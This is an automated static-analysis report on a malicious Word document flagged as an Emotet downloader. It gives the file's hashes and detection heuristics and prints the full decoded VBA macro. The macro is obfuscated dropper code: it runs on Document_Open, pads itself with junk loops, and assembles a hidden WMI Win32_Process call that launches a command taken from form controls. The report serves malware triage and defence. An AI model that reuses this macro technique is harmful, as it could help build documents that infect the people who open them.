Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2991fc4edb1a667…

MALICIOUS

Office (OLE)

182.8 KB Created: 2019-12-20 19:40:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: 021369dd438b340f58615f40985fa118 SHA-1: 16361b5545b27f0940621b6c23e61bb2667ee999 SHA-256: d2991fc4edb1a667fa2dcaf28987c4c24b844331d705f9fda99ed82680e886de
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-7473714-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7473714-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Zlbxvmqxbhtbm = GetObject(Oozvcrfscl)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7575 bytes
SHA-256: 08c944f3b4cd9e1d22d5483e817d198340b20aa35870bbb767208a62059a47fd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
176 of 317 identifiers look randomly generated (e.g. 'Mvvlfjqljgcry') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Vxxjpuroivnlu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Gytiudbjvyj, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dsxkvdqwvbxbw = 234 + 423
   Do While Ietrcxlummv = 1
      Dyahtlnx = 3 * Zytfqziujrm
      Dggzsykx = ("Fred")
      For Qtwbqilh = Pusirvvesl To Nywbnluyosy
         Ltxrmyjv = ("Omnis.")
         Jnyhwdgeps = 223
      Next
      Yepuzmrvw = Egbxmgmasgmnn
Loop
Ovmdxabvzp
   Jppvdpsfkq = 234 + 423
   Do While Atehjxzdj = 1
      Tfzrxydfo = 3 * Fsvxasiu
      Xbwmxqhboxa = ("Qui rerum aliquid.")
      For Vpexvhglw = Nmmmwgvpctwec To Hweapczlzhwun
         Cahzyldueicl = ("Ratione libero tenetur assumenda doloremque dicta est harum.")
         Ylbsvzkhwdu = 223
      Next
      Nfzlhciq = Dgoebzsmrvyaw
Loop
End Sub

Attribute VB_Name = "Xwtsaryn"
Attribute VB_Base = "0{41A8A298-BA38-488F-9A2F-CA3C8BE5D474}{8E2F5AD2-4690-4C7A-BC26-6CDED876C27F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Uabiwvktv"
Function Xpdnzdpoiosa()
   Hxmiztra = 234 + 423
   Do While Hsewzhte = 1
      Ujgujlod = 3 * Lxbhlcarnja
      Dttcyxtqrfl = ("Asperiores ut aut aut.")
      For Qsyoeozyqjrwl = Cqkdlsdbp To Giztsqxnmis
         Mjrmjcfna = ("Nostrum earum fuga dolor.")
         Auhxfnqjfoh = 223
      Next
      Wrbyxkykrfrcb = Ndcgwltxiaiz
Loop
Kinetedfx = Vxxjpuroivnlu.Gytiudbjvyj
   Klgskatlinoel = 234 + 423
   Do While Fnaepnkcgy = 1
      Tjfvdofslxu = 3 * Onxtmhosz
      Yeokzjztak = ("Amet.")
      For Crlpfrah = Xaanjtrvxu To Wyzuscxaoxplu
         Ribziqnh = ("Voluptas.")
         Lagcfnfigv = 223
      Next
      Lyxjswzloth = Mvvlfjqljgcry
Loop
Ptjywpbprdtd = Kinetedfx + Xwtsaryn.Otgopzttwwsxm + Xwtsaryn.Xhaofdoue + Xwtsaryn.Huzdaljzgutn
   Mpxxwbgr = 234 + 423
   Do While Bsfoibqpfea = 1
      Rmsjvsddajjt = 3 * Fwadvkvdl
      Bsbxqict = ("Ut unde minima.")
      For Leskzdjai = Svktfafhyoax To Abgjahzuaush
         Hmcdzgjxrelhw = ("Corrupti deserunt sed et.")
         Rkglqybdqhovx = 223
      Next
      Axiizmmwxzk = Cysknwjjlv
Loop
Hbjhcyhq = Ptjywpbprdtd + Xwtsaryn.Yumsgllsxk + Xwtsaryn.Ycqbeaauqeyp.Tag
   Gknrkjewgug = 234 + 423
   Do While Iolaztiezig = 1
      Ghfnkyvvlka = 3 * Tnlyspksnt
      Woykhbhev = ("Tempore.")
      For Qtjiqsxdkgqav = Qqcwtnog To Xkditonrpu
         Guzqqfzgn = ("Eaque sed quis et.")
         Glqczjkbmvyt = 223
      Next
      Urscjfxvhjhw = Jgiwtswxclohf
Loop
Xpdnzdpoiosa = Xhhtcaavbd + Hbjhcyhq + Xhhtcaavbd
   Kxgijdrldsqcz = 234 + 423
   Do While Putfchevy = 1
      Yiclpbmbhcg = 3 * Yknugkmdqltnm
      Sgcisvejjrdoq = ("Alfred")
      For Cicvhstkpndki = Ydsqjbzyzc To Ecdvwfqj
         Qbdyvnuokv = ("Occaecati ipsam beatae inventore.")
         Tawzoxcj = 223
      Next
      Nrphmshfsnxn = Mkfmdlrynejd
Loop
End Function
Function Ovmdxabvzp()
   Mcbdenpu = 234 + 423
   Do While Utxbcznbou = 1
      Czurhxruwbq = 3 * Jzpqcfetpxxlu
      Gemewvabi = ("Brendan")
      For Rdumsdeet = Kmoaxmcwfmkmo To Lxbjxgdwoay
         Uhqtehtaq = ("Recusandae dolorum non modi ullam quos ea iusto.")
         Nzmhthrgudrgc = 223
      Next
      Shqzayjx = Wrhhyovbdvytw
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Kmrzuwhpy = 234 + 423
   Do While Rnplsbun = 1
      Jghbmqsx = 3 * Ivlbzpvuxrbd
      Nemttltuxgafk = ("Quis et.")
      For Goryqtvco = Fappzgrl To Dydpyoyfa
         Xlrckfycr = ("Terrence")
         Hqfsfhguozkad = 223
      Next
      Irfxwnryhoy = Asiwefqnjfi
Loop
Rpiaolvlcxto = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Vxxjpuroivnlu.Gytiudbjvyj + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
   Xeftpulxgqj = 234 + 423
   Do While Txwhcgzltxi = 1
      Nqpjkhatdzt = 3 * Bkzkuwxija
      Hnncdgwgy = ("Lynn")
      For Iwfbpvpxcxre = Jdlqiepgdd To Qzswemuoro
         Imtdhiqjxqud = ("Doloremque sit eaque.")
         Qcfbschcepf = 223
      Next
      Fjavuoqivlmz = Loafplovsj
Loop
Oozvcrfscl = Join(Rpiaolvlcxto, "")
   Kwyfoexiqau = 234 + 423
   Do While Lklpfrvae = 1
      Dpxcvrlhgig = 3 * Mtcmsrfua
      Uuuynwmgl = ("Harum nostrum.")
      For Zgvmzomu = Ogcmoihm To Dlqiaxmtkvalx
         Wrgsqhgfdgos = ("Deserunt eveniet dicta consectetur.")
         Nftgkyopmmbbt = 223
      Next
      Dcjrrrrb = Pxfncmeatxq
Loop
Set Zlbxvmqxbhtbm = GetObject(Oozvcrfscl)
   Tuzfolttwnla = 234 + 423
   Do While Frngtplllr = 1
      Tzhvpsrmux = 3 * Phzzrbxoluce
      Pfjhihqdsum = ("Byron")
      For Tieqheuqlpluk = Zywcxycl To Pgbmpfnpee
         Evacaeqyn = ("Fugit ipsum maxime distinctio soluta in incidunt.")
         Qdtxkdzrxbe = 223
      Next
      Tdwjxefpuruab = Yvdyrskjvhdme
Loop
Wdjjiyfqaqw = Oozvcrfscl + Xwtsaryn.Zfekhwtx.ControlTipText + Xwtsaryn.Moatwzzciu.ControlTipText
   Cnvpbkuv = 234 + 423
   Do While Amyheezvdmy = 1
      Xxizdyqllj = 3 * Tmfamghbnffs
      Vgdficsdx = ("Dolorem neque odio rerum reiciendis aperiam enim placeat quia expedita.")
      For Kqxofocvplrt = Grhvrspmydk To Bazppnhcp
         Ircxxudmioc = ("Explicabo suscipit.")
         Ifzdystewh = 223
      Next
      Qvcgnoqhumaq = Dayarypohjo
Loop
Bjvwjheqp = Wdjjiyfqaqw + Vxxjpuroivnlu.Gytiudbjvyj
   Tnrzrscapm = 234 + 423
   Do While Lsjmwsszuqe = 1
      Uyvsomzr = 3 * Oxugeekt
      Zguuhsbcdpdj = ("Accusamus sit eos veniam eveniet suscipit est soluta.")
      For Wthiazqympupc = Vkxdzcnealv To Ojafawjkwbsbe
         Fasqpohffgwv = ("Eos dolores voluptate omnis veritatis est sequi.")
         Gweotkcooof = 223
      Next
      Yiebvbtz = Fwigeuzebavq
Loop
Set Ovmdxabvzp = GetObject(Bjvwjheqp)
   Xrayabska = 234 + 423
   Do While Swozrynkem = 1
      Zsplmmfdxcmjt = 3 * Tixfhetz
      Ivicppuxsag = ("Dolore.")
      For Fxufppkffnx = Ghrtgtyw To Xahnrladuit
         Mydjfjdik = ("Dolore cumque sint qui doloribus nobis mollitia accusamus ex.")
         Jngyunmsbgx = 223
      Next
      Csufjclio = Vcjtmaims
Loop
Ovmdxabvzp.XSize = False
   Hrzqymfjrln = 234 + 423
   Do While Luytiwilrmqk = 1
      Vgdqkrnwpis = 3 * Opvwkpvbhnh
      Qdpejgzwjc = ("Ea.")
      For Crhoepbjitwv = Udontvmyb To Lzmzrfmha
         Nndxfuewhuodl = ("Sheila")
         Vjsieqyht = 223
      Next
      Krojnpywpak = Ruebmwwacij
Loop
Ovmdxabvzp.YSize = False
   Yddmihtlwbq = 234 + 423
   Do While Laxeesmyw = 1
      Onlnlrqhzy = 3 * Yqvwxwfjla
      Aefywgpb = ("Ut harum sit.")
      For Xuvgafkihkvp = Iwpcrwyojkm To Rlsjonftba
         Aycsuflfrqzrm = ("Et facere.")
         Ujlkttts = 223
      Next
      Bgctuhwxgrx = Pebbtblawdlkj
Loop
Do While Zlbxvmqxbhtbm.Create(KSNNSN & Xpdnzdpoiosa, Ulyxaawbh, Ovmdxabvzp, Zbhuutan)
Loop
   Azddxdhpsivox = 234 + 423
   Do While Tcbzdjjamjcl = 1
      Cvhaujgges = 3 * Xejhysbyj
      Grqqyrtust = ("Porro placeat quisquam.")
      For Noodmonyjjv = Rfljkocwk To Ethpkxxnto
         Kpokwhbwvelg = ("Sit voluptatem omnis eos.")
         Kifbtcneyt = 223
      Next
      Nlmisrvmauvef = Enziadcnpi
Loop
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.